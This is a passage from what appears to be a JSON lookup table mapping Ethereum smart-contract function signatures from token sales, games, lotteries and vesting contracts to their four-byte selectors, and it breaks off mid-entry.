"AlphaMarketCoin(address)": "0x7ef72eb5", "AlphaMarketTeamBountyWallet(address[],address)": "0xfc8c2f0d", "UbiRewardToken()": "0x32f5ea27", "redemptionBurn(address,uint256)": "0x9d1eeb97", "setFreezingPeriod(address,bool,uint256)": "0x68889db8", "_setFreezingPeriod(address,bool,uint256)": "0x189052ac", "_freezeAccount(address,bool)": "0x79c7f38c", "daysToUnfreeze(address,address)": "0xdb491de9", "bountyTransfer(address,uint256)": "0x29fb598e", "setBountyDistributionContract(address)": "0xfa05064e", "ICOTokenDelivery(address,uint256)": "0x0f4dfc17", "preICOTokenDelivery(address,uint256)": "0xaf3d8e43", "_tokenDelivery(address,address,uint256,uint256)": "0x73b51f0b", "_isTransferAllowed(address,address)": "0x7330aca4", "_initializeAccount(address,address,uint256,uint256)": "0xc22f1c54", "removeExchangeAccounts(address,address)": "0xa1ad2b99", "addExchangeAccounts(address,address)": "0xd7bd6d0d", "setFundAccount(address,address)": "0x292a2879", "CinociCoin(uint256,string,string)": "0xdf52f321", "Anubis()": "0x1977f5c6", "Involve()": "0x83829bf1", "setIco(address)": "0x49f194a1", "_forwardFunds(uint256)": "0x1b27e705", "setTokenCountFromPreIco(uint256)": "0x0d57a47f", "logEntropyTxDetails(string,uint256)": "0x609ada00", "EntropyTestToken()": "0x70b2ef56", "Griddeth()": "0xb19bc02e", "setColor8(uint256,uint8)": "0x21e88888", "getGrid8()": "0xef220233", "GGPCToken()": "0xc97358df", "crowdsale()": "0x9c1e03a0", "NGX()": "0xde52ccbe", "ProdPublicSale()": "0xfe415139", "canRefund()": "0x7f83a4a6", "PublicSale(address,address,address)": "0xa43ea59b", "Presale(address,address,address)": "0x1c96ef03", "sendWingsRewardsOnce()": "0x5d9d595c", "isFinishedSuccessfully()": "0xd01860d0", "tokensPerWei(uint256)": "0xf6508be6", "recalcBonuses()": "0xf359b03c", "weiToTokens(uint256)": "0x53aaef7d", "tokensPerWeiPlusBonus(uint256)": "0xcf1b11e8", "amountPercentage(uint256,uint256)": "0x7b755373", "sellTokensForEth(address,uint256)": "0xf5af4035", "setWhitelistEnabled(bool)": "0x052d9e7e", "updateTokensPerEthOnce(uint256)": "0xe0813e5e", "updateMaxCapEthOnce(uint256)": "0xe36ba174", "updateMinCapEthOnce(uint256)": "0x5cb2ffb5", "CommonTokensale(address,address,address)": "0xf47795f3", "closeBridge()": "0x1b89ee31", "changeBridge(address)": "0x08774410", "notifySale(uint256,uint256)": "0x8eddc804", "Bridge(uint256,uint256,address,address)": "0x67dbf587", "BasicCrowdsale(address,address)": "0xc6d04634", "removeMany(address[])": "0x8dcfdaad", "addMany(address[])": "0xb37d97b5", "historyCount()": "0x3a9c9ffc", "CommonWhitelist()": "0x25cdca8d", "sellNoDecimals(address,uint256)": "0x7c9473f6", "changeSeller(address)": "0xcd3a376a", "CommonToken(address)": "0x1347b9ae", "ownerHistoryCount()": "0x37034853", "ownerSetCasino(address)": "0x148174cd", "ownerSetJpMinBet(uint256)": "0xa5304fc3", "ownerSetMaxProfit(uint256)": "0xde329396", "withdraw(bytes32,string,string)": "0xfcd9f4ce", "getToJackpot(uint256)": "0xee83ce87", "getProfit(uint256,uint256)": "0xf6b15fe6", "getFullProfit(uint256,uint256,uint256)": "0x0e7470cb", "generate()": "0x2a1bbc34", "isOnExchangeById(uint256)": "0xabd2ecb7", "isOnExchange(uint256)": "0x5fda0dc1", "getTokenId(uint256)": "0x14ff5ea3", "create(address,uint256,uint256,uint256,uint256,uint256,uint256,uint256)": "0x52638d75", "getCrystalWeights()": "0xddfa3a60", "setEstimatedWeight(uint256)": "0x569d623f", "_updateNeeded(uint256,uint256,uint256)": "0xaa36b52e", "_estimateWeight(uint256,uint256,uint256,uint256,uint256)": "0xaa41d605", "_estimateSupply(uint256,uint256,uint256,uint256)": "0x4786cfea", "_getWeightUntil(uint256,uint256)": "0x14c65687", "_getWaitingBlocks(uint256)": "0xb3480369", "_getYearIndex(uint256,uint256,uint256)": "0x5cb603dd", "_getBlockIndex(uint256,uint256)": "0x9a684658", "_getBlockIndexAtYear(uint256,uint256,uint256)": "0x13c1629c", "_getBlocksPerYear(uint256)": "0x84cb4fec", "getCrystalGeneKindWeight(uint256)": "0x8c3b6f0e", "getCrystalKindWeight(uint256)": "0xaf62a708", "mint(address,uint256,uint256,uint256)": "0xa647e8ec", "setAcceptable(address)": "0x04d2cdbf", "UTBToken(uint256,string,string)": "0x5ac7a8d0", "bid(uint16,uint16)": "0x2020e9ea", "getActivity(uint16)": "0x3a01e53a", "ActivityCore(address,address)": "0x60175bcb", "withdrawBalanceFromStorageContract()": "0xba6763ce", "setNFTAddress(address)": "0x69d03738", "destroyAndSendToStorageOwner()": "0xb5794222", "LogicBase(address,address)": "0x1887af2b", "getBuyerAddress(uint16,uint16)": "0xff70c4d1", "getAddressBoughtCount(uint16,address)": "0x6310d902", "deleteActivity(uint16)": "0xa22d5a51", "unpauseActivity(uint16)": "0x6361d3e0", "pauseActivity(uint16)": "0xe4d13625", "sellPackToAddress(uint16,uint16,address)": "0x6922eb06", "createActivity(uint16,uint16,uint128,uint64,uint64)": "0xa7cebd4d", "recalcAmountWithFees(uint256,bool)": "0x5eb19ad1", "BCBCYCoin()": "0xbfe7e2eb", "transferToComposition(address,uint256)": "0x861c9c79", "setCompositionAddress(address)": "0x95b9bb68", "returnNotes(uint256)": "0xc1e472be", "purchaseNotes(uint256)": "0x4c2a664b", "NoteToken(uint256)": "0x220d7a7f", "TestTokenERC20()": "0xd13daa79", "MyYLCToken(uint256,string,uint8,string)": "0xdc801db6", "SISKTechnologyGroupToken()": "0x80d24e9d", "MultiSigWallet()": "0xfe7805f2", "QuarkChain()": "0x54cacaba", "MINTY()": "0x24a6a409", "addBonus(uint256,uint256,uint256,uint256,uint256,uint256,uint256,uint256,uint256,uint256,uint256)": "0x4a2a197e", "updateContract(address)": "0xe3db17b8", "EmontFrenzyTool(address)": "0x34e1ad21", "addBonus(uint256,uint256)": "0xb02b69d6", "claim(string)": "0xf3fe12c9", "commitTo(bytes32)": "0x860e6185", "SHA256(string)": "0xa0fe6202", "switchAirDrop(bool)": "0xcfb27084", "AppleToken(uint256,string,string,bool)": "0x6d98c5e7", "changeTimeBonuses(uint256,uint256,uint256,uint256,uint256,uint256)": "0x41c8146c", "changeEtherBonuses(uint256,uint256,uint256,uint256,uint256,uint256)": "0x5b453810", "changeSaleTimes(uint256,uint256)": "0x0dc9c838", "changeAllowInvestment(bool)": "0xc86c50f7", "transferEther(address,address,uint256)": "0x0e96127a", "MTPToken()": "0x37f7151b", "queryGameHistoryLength()": "0x8739f930", "queryGameHistory(uint256)": "0xece02921", "queryBetUnit()": "0xdda0268d", "queryGameStatus(uint256)": "0x3e531e0d", "resolveBet(uint256)": "0x4c36c36e", "placeBet(bytes32,bytes32,bytes32)": "0x94d45856", "setMaxGamePerBlock(uint256)": "0x5cebcbf0", "setMaxBet(uint256)": "0x881eff1e", "setBlockTargetDelay(uint256)": "0x72468368", "setBetUnit(uint256)": "0x97ba89c9", "withdrawFund(uint256)": "0x0cee1725", "setRouletteRules(address)": "0xe0ed78d1", "setShouldGateGuard(bool)": "0xfe8d8c77", "getBetResult(bytes32,bytes32,bytes32,uint256)": "0x182e7533", "getTotalBetAmount(bytes32,bytes32)": "0xf65d226f", "MeTooToken()": "0xefb0cdd9", "ZOOToken()": "0x86749d97", "CoinToken(uint256,string,uint8,string)": "0x43245953", "PrestoToken()": "0x55390b0d", "getNewPetCard(uint8)": "0x76fee774", "retireWildHard(uint64,uint64,uint64,uint64,uint64,uint64)": "0x96ff0306", "retireWildEasy(uint64,uint64,uint64,uint64,uint64,uint64)": "0x693d0141", "checkPet(uint64)": "0xab1d581b", "DataContacts(address)": "0xca558b25", "getTotalPets()": "0x80f03fa6", "getTotalPetCardSeries()": "0x09663cef", "getPetByIndex(address,uint256)": "0x35c42d7f", "getOwnerPetCount(address)": "0x670da6f8", "getPet(uint256)": "0x59d55194", "getPetCardSeries(uint8)": "0x5155d9c6", "setPetName(string,uint64)": "0x87c86277", "ownerPetTransfer(address,uint64)": "0x203cbee2", "transferPet(address,address,uint64)": "0xc9ac836d", "addPetIdMapping(address,uint64)": "0xee94d631", "setPetLastBreedingTime(uint64)": "0x85530d7c", "setPetLastTrainingTime(uint64)": "0x9eb20aa7", "setPetAuras(uint64,uint8,uint8,uint8)": "0xc0d8b0b8", "DeciserToken()": "0xc9380d3e", "canBeWithdrawn()": "0xd73a24fc", "lockedTokens()": "0x0eb34740", "lockLimit()": "0xaeddf677", "latiumBalance()": "0x1b7b7b0d", "LatiumLocker()": "0x5928bdc4", "Latium()": "0x1468d9cb", "PixelCore()": "0xc3d32e56", "getHighestBid(uint256)": "0x8f288644", "setAuctionsEnabled(bool)": "0xd6a45623", "buyEmptyPixelArea(uint256,uint256,uint256,uint256)": "0xcd5ab612", "buyEmptyPixel(uint256)": "0x1dfd04b9", "setNewPixelPrice(uint256)": "0xf1c22a05", "getPixelAreaColor(uint256,uint256,uint256,uint256)": "0x2723639b", "getPixelColor(uint256)": "0x7b68a8f0", "setPixelAreaColor(uint256,uint256,uint256,uint256,uint32[])": "0xf1979de8", "setPixelColor(uint256,uint32)": "0x47d1d135", "setMetaBaseUrl(string)": "0x4f224baa", "ownersOfArea(uint256,uint256,uint256,uint256)": "0xe372d0eb", "transferFromIco(address,uint256)": "0x61a7b2f5", "manuallySetNumRewardsAvailableForChildAddress(address,uint256)": "0xdd386239", "setNumRewardsForTMEUser()": "0xac856216", "SwingTradeToken()": "0x0530abf0", "refundCrowdsale()": "0xd7dd8652", "burnOwner(address,uint256)": "0xb6c05255", "ZeroHooStandardToken(uint256,string,uint8,string)": "0xa6defd45", "PetsCoin()": "0x6e14b71b", "startsWithDigit(string)": "0x86b0fc9d", "setParams(uint256,uint256,uint256)": "0x5a0ce676", "chooseWinner(string,string)": "0x8e48474a", "start(bytes32)": "0x015a18ed", "Moviecoin()": "0xa08783bf", "unlockToken()": "0x18a24b5b", "checkWhitelist(address)": "0x1950c218", "removeWhitelist(address)": "0x78c8cda7", "addWhitelist(address)": "0xf80f5dd5", "LukaCoin()": "0x1bff4c07", "getInvested()": "0xbefc3e2b", "getAffiliateCommision()": "0x43c6e10d", "getProfit(address)": "0xc600e1dc", "getProfitFromSender()": "0x5f3619b1", "getInvestorPosition(uint256)": "0x6a4d4bb8", "inheritInvestorPosition(uint256)": "0xcc6d8ba6", "reinvestProfit()": "0xe3b61135", "withdrawAffiliateCommision()": "0xf09dd7c6", "divestETH()": "0x1054d657", "investETH(address)": "0x7a99ba4f", "EtherPiggyBank()": "0x319609fa", "KoalaChain()": "0x24506e2a", "getAmountBonus(uint256,uint256)": "0xe52b6a56", "getStageBonus(uint256,uint256)": "0x4ff2bcb7", "calculateEthToAfterschool(uint256)": "0xb0ecc878", "Redeem(string,string,address)": "0x164d3f3a", "Create(uint256,uint256,uint32)": "0xad8718c2", "GetChequeInfo(string)": "0x31c33669", "VerifyCheque(string,string)": "0x5a0024ae", "GetChequeInfoByHash(uint256)": "0xf6c1db4c", "RefundChequeByHash(uint256)": "0xcb526229", "RefundChequeById(string)": "0xaa2529a2", "WithdrawEther(address,uint256)": "0xdb35132c", "UpdateMaintenance(bool)": "0xad7e7cfc", "SetMaxAttempt(uint8)": "0x994e5267", "SetMaxChequeValue(uint256)": "0xddca337e", "SetMinChequeValue(uint256)": "0x4b57fbaf", "SetMinFee(uint256)": "0x81d2c871", "SetCommissionRate(uint256)": "0xa79a416d", "EtherCheque()": "0xd63241a6", "getDividendBalance(address,address)": "0x0e8de473", "shareDividends()": "0xecdf6fed", "updateDividendBalance(uint256,address,address,uint256)": "0xdcb3ff58", "MentalHealthLifeToken(uint256)": "0xe19fb933", "currentStanding()": "0x316e539e", "sendMoneyBack()": "0xbe363e36", "standing()": "0xe3a47b00", "termination()": "0x40734387", "moneyBack()": "0x30659e74", "sendMoneyOwner()": "0xf4fde3b6", "AvPresale()": "0x2ebc760b", "weiToPonzi(uint256,uint256)": "0xd6b5abc9", "availablePonzi()": "0x368af7f3", "byPonzi(address)": "0xdaa9604d", "setRewardPercent(uint256,uint256)": "0xc79bdb46", "provideAccess(address,uint8)": "0xd70d532b", "rewardPercent()": "0xd0302051", "setPonziPriceInWei(uint256)": "0x96469132", "ponziPriceInWei()": "0x684edea8", "ponziAddress()": "0x48acce46", "setPonziAddress(address)": "0xdf148cdb", "PonziSeller()": "0xbb8f0dd2", "calculateUSDWithBonus(uint256)": "0x0d99bbec", "calculateInternalTokensAmount(uint256,uint256,uint256)": "0x6b58b2bc", "internalCalculateEthersWithBonus(uint256)": "0x7cfe18c0", "isRefundPossible()": "0xfb7043ea", "calculateTokensAmount(uint256)": "0x518bed3f", "mintInternal(address,address,uint256)": "0x21065f10", "setEtherHolder(address)": "0x67a2072c", "setEtherInUSD(string)": "0x9ed26fe8", "updateMaxSupply(uint256)": "0xf103b433", "calculateUnsoldTokens()": "0x32b30b64", "setDevelopeo(address)": "0x9906f41c", "DIRT()": "0x1d74f3a5", "setVestingMasterAddress(address)": "0x66210532", "avaliableSupply()": "0x04a84938", "EligmaSupplyContract(address,address)": "0x78720063", "setWithdrawalAddress(address,address)": "0x023c8be2", "salvageOtherTokensFromContract(address,address,address,uint256)": "0x10764268", "revokeVesting(address,string)": "0x5e00a177", "fundVesting(address,uint256)": "0x64f15430", "deleteVestingFromStorage(address)": "0x136cf5c1", "storeNewVesting(address,string,uint256)": "0x428657f7", "vestingExists(address)": "0x6b3ec0ac", "checkForReceivedTokens()": "0xf61ac3a4", "TokenVestingContract(address,address,uint256,uint256,uint256,uint256,bool)": "0x28e158d0", "addInternalBalance(uint256)": "0xa3c88b31", "addLockedAmount(uint256)": "0x59d90c19", "substractLockedAmount(uint256)": "0x8910cd58", "amountLockedInVestings()": "0x1806874a", "salvageOtherTokensFromContract(address,address,uint256)": "0x7b24343e", "updateBalanceOnFunding(uint256)": "0x26000ba2", "revoke(string)": "0x65b2a863", "getReleasableFunds()": "0x03991aea", "WEGC()": "0xd87bc4cd", "X(uint256,string,string)": "0x41161aac", "Rozium()": "0x70477e2b", "DroplexToken()": "0xe7299675", "DAFZOToken(address,address,address,address)": "0x328ede54", "TeamHeadsChoice(address)": "0x4a4226a5", "checkAccountSchedule(address)": "0x449d0eb1", "SWIZERStandardToken(uint256,string,uint8,string)": "0x57035b60", "BitArbToken()": "0x986c7cc7", "RushCoin()": "0x9cdee922", "publish(string,string)": "0xc163bba7", "Tesoro()": "0xe20a9ae9", "unhold()": "0xd13209f9", "VLBRefundVault(address)": "0x8d8a7f07", "frozenFunds(address)": "0xd553adf0", "setMaxPayments(uint256)": "0x7cb51761", "setMaxUserPayment(uint256)": "0x1d8adb7a", "ETFloorPresale(address)": "0x344605f4", "MYL(uint256,string,string)": "0xd3933154", "VeritaseumToken()": "0xc094c73e", "Kildoneum()": "0x74ce52ce", "AUD_Omnidollar()": "0xd8d4a75e", "CONI()": "0x81547f25", "Pheonix(uint256,uint256)": "0x9d858a80", "IdolCoin()": "0xf18697cf", "declarePulicOfferingPlan(uint256,uint256)": "0x30fe86b7", "createCitizen(uint256,address)": "0x08824fb7", "deleteCitizen(uint256)": "0xdd55f11b", "allStates()": "0x8baba52a", "getNowTokenPrice()": "0xb444b606", "checkGameOverByUser()": "0x542cae98", "checkGameOver()": "0xaaecc9cf", "userFinalize()": "0x0d6798e2", "changeHolder(uint256,address)": "0x16f4acf8", "changeTimeWithoutUpdate(uint256)": "0x3d1e40a7", "changeFundsKeeper(address)": "0x9ba8975f", "changeMigrate(address)": "0xf87482e1", "setMigrate(address)": "0xeae8a3d6", "changeStock(address)": "0xb5e91891", "setStock(address)": "0x563433d7", "setEpisodeManager(address)": "0xf44e1351", "DeusETH(address)": "0x995a2b52", "CriptaliaRewards()": "0xf7f33c54", "HalalPenny()": "0xf2934817", "FSCP()": "0x4ae8f9fb", "isInvestor(address)": "0xcee2a9cf", "fundICO()": "0x64648589", "buyTokensLowLevel(address,uint256)": "0xa3863d81", "buyTokensOraclePayIn(address,uint256)": "0xf3aa67ad", "getTokensAcquired(address)": "0x7d051cf3", "weisDeposited(address)": "0x86628eed", "PGTBToken()": "0x931634fd", "AvtcToken()": "0x430ae7a2", "VibeToken()": "0x22351b6b", "Daereum()": "0x1dbd21c3", "PasserBy(address)": "0x0f974ef2", "DTCC_ILOW_8()": "0x19110d05", "PrivateSaleExchangeRate(uint256)": "0xf974ae3c", "mistakenTokens()": "0xefb7e8b3", "initialize(address,address,uint256,uint256)": "0xeb990c59", "GUNS()": "0xc9ee21fa", "webpud()": "0xe798f4eb", "BCBtuCoin()": "0x604c7ef4", "cityPrice()": "0xe56ee3c1", "townPrice()": "0x102046db", "villagePrice()": "0xdfb36b0b", "purchaseLandWithCC(uint8,bytes32,uint256)": "0xab6ef0b1", "purchaseTown(uint256)": "0x471f11ec", "purchaseVillage(uint256)": "0xcc98ff20", "addCCUser(bytes32)": "0x63e12cdc", "addWalletAddress(address)": "0xa109a089", "LandSale(address,uint256,uint256,uint256)": "0xb9da706e", "_create_drug(bytes32,address,uint256,uint256)": "0xd70948b5", "getDrugs()": "0x5fb07a62", "getDrug(uint256)": "0xb8840d3d", "createPromoDrug(bytes32,address,uint256,uint256)": "0xc36433e2", "createDrug(bytes32,uint256)": "0x9b85b9c9", "EtherDrugs()": "0xd42eeb4f", "OntologyToken(uint256,string,string)": "0xb83e4779", "overdraftPeriodsNumber()": "0xaf44e487", "tokenCapForFirstMainStage()": "0x2f923c59", "totalTokenRaiseWei()": "0xb1267579", "mediaToken()": "0x8920bcf9", "package()": "0xaaac9718", "minimalPriceUSD()": "0xc64572b8", "hardCapInUSD()": "0xc1560a14", "realitycheck()": "0x0c2a48e2", "mktCoinCap()": "0x437d07d5", "tokenExchangeRateBase()": "0x6eaefc87", "preSaleBonus3Time()": "0xa280b3db", "commissionPCT()": "0xb75f9b20", "minGasPriceGwei()": "0x3036d769", "TEAM_PERCENT_EVE()": "0xa2ebaa1d", "crowdSaleHardCap()": "0x326b1001", "startPrivatePreICO()": "0x722f0835", "lastNegativeVoting()": "0xd246a8c9", "TYPE_EXPLORER()": "0x31db6c48", "tc()": "0xf6420e15", "ownership()": "0x5d03147a", "realUnicornAddress()": "0xd899299e", "allowedToBuyBack()": "0x8a4db4fa", "displayString()": "0xb58baa0d", "OPENSOURCE_TOKENS()": "0xdc7abeb3", "totalWitdrowedToken()": "0xf3fe5bc2", "minInvestedAmount()": "0x63db30e8", "COMMUNITY_ALLOWANCE_LIST()": "0x3cc71c3f", "game_allocation()": "0xc0b7eba4", "edge()": "0xadc2c98a", "m_owner()": "0xdeff41c1", "crowdSupply()": "0xa182da60", "totalSupplyIsLocked()": "0x61718141", "WthdrawAllToCreator()": "0x547dfaf5", "leed()": "0x5e46f419", "contractstarttime()": "0x374abace", "releasedLockedAmount()": "0x5efe2fcf", "ICOEndDate()": "0x20a0128e", "assigner()": "0x19973261", "startTimeICO()": "0xd2e90d0f", "ZJFTokenDeposit()": "0x155dcb47", "isAfterICO()": "0xd79e7894", "player5()": "0x7718ce93", "kyberReserve()": "0x533019cb", "INITIAL_FUND_BALANCE()": "0x56ca7143", "noStoresSet()": "0x484f4bc0", "crowdsaleTokenAmount()": "0x0dc5bffb", "BONUSED_PURCHASES_LIMIT()": "0xf2d213c8", "percentageRecipient2()": "0x9fc6d585", "ert()": "0xbed54a24", "minBidValue()": "0x174efd12", "icoTokensCount()": "0x4b8b704e", "AragonSupply()": "0x2553795a", "superNovaSupply()": "0xfb79e70f", "tokenBonusForFifth()": "0x52b860eb", "privatesale_start_time()": "0x46a54e15", "FOUNDER_FUND_2()": "0x54a019e2", "chairperson()": "0x2e4176cf", "minInvestInWei()": "0xe861e34d", "resetBurntTokens()": "0x65b1c987", "additionalEmission()": "0x6df26327", "getTokenPriceforDapp()": "0xe3e7519c", "getMotd()": "0xda274488", "maxRandomRound()": "0xebfa3c1b", "asideTokensHaveBeenMinted()": "0x8343e416", "castleMaxLevelGap()": "0x638f8da4", "donationSum()": "0xdff0259f", "returnOwners()": "0xdde9394c", "loveMessage()": "0x14b92721", "discountRate()": "0xe6c0e6d5", "saosao2()": "0xdda5d5cb", "txFee()": "0xcf820461", "PERC_TOKENS_TO_RELEASE()": "0x2886b47a", "secondStageRaised()": "0x46eea9a1", "perClaim()": "0x5f9602e8", "AdvisorPart()": "0x9b96c4ba", "MAX_TRANSFERS()": "0x2b9b7573", "centralAuthority()": "0xe77ff2f6", "ICOstartTime()": "0xc1da3923", "teamVault()": "0x8ab5212b", "isCollectTokenStart()": "0x8fb2f8b4", "release6m()": "0x6b475df7", "sgt()": "0x357a0ba2", "deathData_a6()": "0x9aded5dc", "_getrand09()": "0xe29f9da6", "getBlockValue()": "0xa9acc475", "player2()": "0x59a5f12d", "investBalance()": "0xdf12b94e", "bancorRegistry()": "0x0f4f8184", "killTotalSupply()": "0x79787196", "kek()": "0x5dd8e1d5", "loadedRefund()": "0x797d9437", "tokenSpender()": "0xa2261508", "StaticEthAvailables()": "0x5d484e17", "totalriskcoinsSupplys()": "0x3830ceeb", "saleableTokens()": "0xe1ac48ad", "durationInBlocks()": "0xf9f90a60", "RateEth()": "0xf680b106", "BILLION()": "0x4beda18b", "totalQuantity()": "0xc616f412", "tokenAddr()": "0x5fbe4d1d", "YayyyToken()": "0x5d3a70f9", "Simoleon()": "0x908687a9", "Swift()": "0xd1e9ab13", "getNameFromKoikeToken()": "0x4c7ae3ac", "getKoikeContract()": "0x889569cd", "setAmountToKoikeToken(uint256)": "0x014bed81", "setKoikeToken(uint256,address)": "0xcf913ae7", "Hiken(uint256,string,uint8,string)": "0xf786bb62", "ERCTestToken()": "0x79cd421d", "approve(address,bytes)": "0x014647f4", "MetaBall(uint256,string,string)": "0x0f5f8593", "Volkstest3()": "0x47026d90", "DCToken(uint256,string,uint8,string)": "0x3976be0b", "canIssue(uint256)": "0x07002f02", "setDiscount(uint256[],uint256[])": "0xf3737ffd", "TIX(uint256,address,uint256[],uint256[])": "0x9310ba96", "processFinishLottery(address)": "0x935e1533", "newCustomFutureLottery(uint256,uint256,address,uint256)": "0xd1812be7", "newFutureLottery(uint256,uint256)": "0x92ff7859", "newLottery(uint256)": "0x48ed994c", "SparkChainToken()": "0x3d126e57", "balanceContract()": "0x322a5e5f", "refundToInvestor()": "0xbb33072f", "setOraclizeContract(address,address)": "0x179ac197", "getConfirmRefund(address,address,uint256)": "0x0488dbfb", "getPriceToken()": "0x72f0424f", "prepareForRefund(address,address)": "0xa567d371", "hbtoken()": "0xd6545ede", "lonmemay()": "0x26ae27d6", "approve_tx(address,bytes)": "0xb9f4657d", "checkTransferFunctionPrivateSale(address,address,uint256)": "0x818f7d01", "checkTransferFunction(address,address,uint256)": "0x128d9281", "addtoOwners(address,address)": "0xf286c1c5", "addtoEarlyInvestors(address,address,uint256,uint256)": "0x952882fd", "addtoMarketingBusinessDev(address,address,uint256,uint256)": "0x42e956f6", "addtoTechOperation(address,address,uint256,uint256)": "0xaa863759", "addtoContributos2(address,address,uint256,uint256)": "0x63fcf5de", "addtoContributos(address,address,uint256,uint256)": "0x2d6d4caa", "addtoPrivateSale(address,address,uint256,uint256)": "0x74d04f83", "end_LOCKUP()": "0xa4df320d", "start_LOCKUP(uint256)": "0x20f06c9b", "VIWOZ()": "0xc764ee57", "modifyEndFundingTime(uint256)": "0x8edb726d", "buyme()": "0x482da403", "Volkstest()": "0xd03e6817", "modifiyEndFundingTime(uint256)": "0xf0c45472", "join(string,string)": "0x29803b21", "cancelCreation()": "0x50479065", "metadataToken()": "0xcd0389fd", "Lakshmi(uint256,string,string)": "0xdabb37d4", "_bytesToUint(bytes)": "0x8bcb4250", "_transferLand(uint256,uint256,address)": "0xd031d8c4", "_pushLandId(uint256,uint256)": "0xf49a66fd", "_getNewEstateId()": "0xf0cfcaa8", "_updateMetadata(uint256,string)": "0xe151fb62", "_mintEstate(address,string)": "0x3e6e2a73", "safeTransferManyFrom(address,address,uint256[],bytes)": "0xd93eeb5c", "safeTransferManyFrom(address,address,uint256[])": "0x73b913fa", "getEstateSize(uint256)": "0xf4a43448", "setLandRegistry(address)": "0xd5ed9cba", "transferManyLands(uint256,uint256[],address)": "0x40807049", "transferLand(uint256,uint256,address)": "0xa506e5dc", "ammendReceivedLand(uint256,uint256)": "0x137759df", "updateMetadata(uint256,string)": "0x53c8388e", "getLandEstateId(uint256)": "0xbb969132", "CipherPlay(address,address)": "0xa1c15f56", "withdrawWbtToken(address,uint256)": "0xc307f6ba", "transferBctToken(address,uint256)": "0x5cbb122c", "BoSToken()": "0x12ea7d20", "createDoc(string,string,string)": "0xe7f578e1", "lastId()": "0xc1292cc3", "ETCH3dVs()": "0xb86a3582", "deleteRoomByIndex(uint256)": "0xb5446457", "InternationalPaymentToken()": "0xdd7e11be", "submitPresetTransferes()": "0x469e2d5c", "submitPresetTransfer(address)": "0xc7021c9e", "allowancePresetTransfer(address)": "0x9893f27e", "decreasePresetTransfer(address,uint256)": "0x1f1c84b7", "increasePresetTransfer(address,uint256)": "0x2c4bf8bc", "removePresetTransfer(address)": "0xa36f127e", "addPresetTransfer(address,uint256)": "0x57c8b724", "_removeAddress(address)": "0x90d19241", "_addAddress(address)": "0xe3699763", "MoncionToken()": "0xfe44d401", "Monday(uint256,string,string)": "0x3508f2e8", "destroyRobot(uint256)": "0x7728f48b", "robotInfo(uint256)": "0x3fc98bd5", "getStandartComponent(uint256,uint256)": "0xde71d56b", "getStandartRobot(uint256)": "0xdfa54594", "hardcoreBattleWith(uint256,uint256)": "0x85eff0ef", "fight(uint256,uint256)": "0xca39e5ef", "declineApproval(uint256)": "0xd4dcbc60", "approveToFight(uint256,uint256)": "0xf68abb25", "collectRobot(uint256,uint256,uint256,uint256,uint256)": "0xe9266fca", "_destroyRobot(uint256)": "0x9aed58c6", "firstEmptyId()": "0x154920b0", "nextPrime(uint256)": "0xb67b60c7", "prime(uint256)": "0x72e0e984", "bytesToUint256(bytes)": "0xcc9de25d", "initiateRefund(bytes32)": "0x44a2542a", "isFoundation(address)": "0xd832d0c8", "isTeam(address)": "0x24851914", "isUnknown(address)": "0x8f398180", "typeOf(address)": "0x6dcb0cf8", "transferEtherTo(address)": "0x5c4bade1", "WPTokensBaskets(address,address,address,address,address)": "0xa73e01cb", "minutesToPost()": "0x4c413139", "getDailyHash()": "0x222f51e9", "numberOfApprovedSteaks()": "0xb9a5a2d9", "getSteakPrize()": "0x4695cf7a", "judge(uint256,bool,bytes32)": "0xbfe484de", "getSubmission(uint256)": "0x3e8686cc", "submitSteak(address,address,bytes32)": "0x2fe4b2d9", "creditOwner()": "0x20dc407a", "initMembers()": "0x3762f0fe", "Steak()": "0xe9db5d79", "crowdsaleHasEnded()": "0x213294cd", "setInitialPrize()": "0x34ec514b", "endCrowdsalePublic()": "0x8a4e7a7c", "getCurrentShare(address)": "0xb2cb3a9b", "distributeAllTokens()": "0x2917f66b", "validInvestment()": "0x75e456c3", "FrameCoin()": "0xe22ae31d", "WLLToken()": "0xe53d4988", "ParkCoin(uint256,string,string)": "0xfdb89360", "StandardToken(uint256,string,string)": "0x69129b4f", "GoodTimeCoin(uint256,string,string)": "0xa95022a6", "SEXNTestToken()": "0x0425e6ff", "backNewHopeOwner()": "0xcfd7be04", "NewHope()": "0x7020940a", "SCAMToken()": "0xd09eae58", "GRAPE()": "0xe53a8a5f", "SafeGift(uint256,string,string)": "0xd39f532d", "updateActivation()": "0x554680f2", "transferETHS(address[])": "0x8b44af0e", "getEarlyAccessKitsRemaining()": "0xc42882e3", "ShroomFarmer()": "0x1925259b", "ticket()": "0x6cc25db7", "HOPEToken()": "0x7912b0f1", "BSE()": "0x070be532", "approveChangeOwner(uint256)": "0x69cdba9a", "proposeChangeOwner(address,address)": "0x460ab47b", "JihoyContract()": "0xccaee929", "PUNCToken()": "0x1e8997ec", "LexitToken()": "0x441691f2", "minFundingGoalReached()": "0x41f1e76c", "HarborCrowdsale(uint256,uint256,address,uint256,uint256)": "0x178a9ffb", "openMinting()": "0x6ba9fd38", "ZillowBlockchain(uint256,uint256)": "0x85002354", "_startCrowdsale(address,uint256)": "0x41db8c93", "startCrowdsale2(address)": "0x9b4d54fc", "startCrowdsale1(address)": "0x498c07f3", "startCrowdsale0(address)": "0xbceceefe", "TokenRDC(address,address,address)": "0x8f44097a", "GOX()": "0x039d8751", "PenCoin()": "0xbc65e9e1", "PumaPayToken()": "0x154e9bd5", "Sunset()": "0xd43503ab", "isAllowed()": "0xa21fbc92", "SetFund(address)": "0x3740eee9", "SetTrustee(address)": "0x91bc85a9", "initDeposit()": "0x4368600c", "retrieveCompletedProof(bytes32)": "0x14ab260e", "retrieveIncompleteProof(bytes32)": "0x5f45221d", "isValidProof(bytes32,string)": "0xc2c5ec41", "releaseProof(bytes32,string)": "0x0ed59a60", "submitProof(bytes32)": "0xbf084408", "GlobexSciICO()": "0xf5c6cd0a", "vote_proposed_address(string)": "0xea118590", "change_sale_address(address,string)": "0x2026a0a7", "buy_the_tokens(string)": "0x000adc67", "toggleLockIn()": "0xb5c05570", "TokenERC20(uint256,string,string,address)": "0x39e2637f", "Indosat(address)": "0x06ca66f0", "AMFBToken()": "0x78d63c59", "NamableAddressList(string,bool)": "0xc0a8694d", "WebcoinToken(uint256,address[])": "0x55cb155a", "GigaWattToken()": "0x7eeec2cf", "backOrenCoinOwner()": "0xf7a6a046", "OrenCoin()": "0x6d1821aa", "GEBEC()": "0x239e7881", "Lucy()": "0x2e0eb6fd", "refundRequest()": "0xcd034234", "transferVaultOwnership(address)": "0xe071c0ca", "mintSilcToken(address,uint256)": "0xe9108538", "finish(address,address,address)": 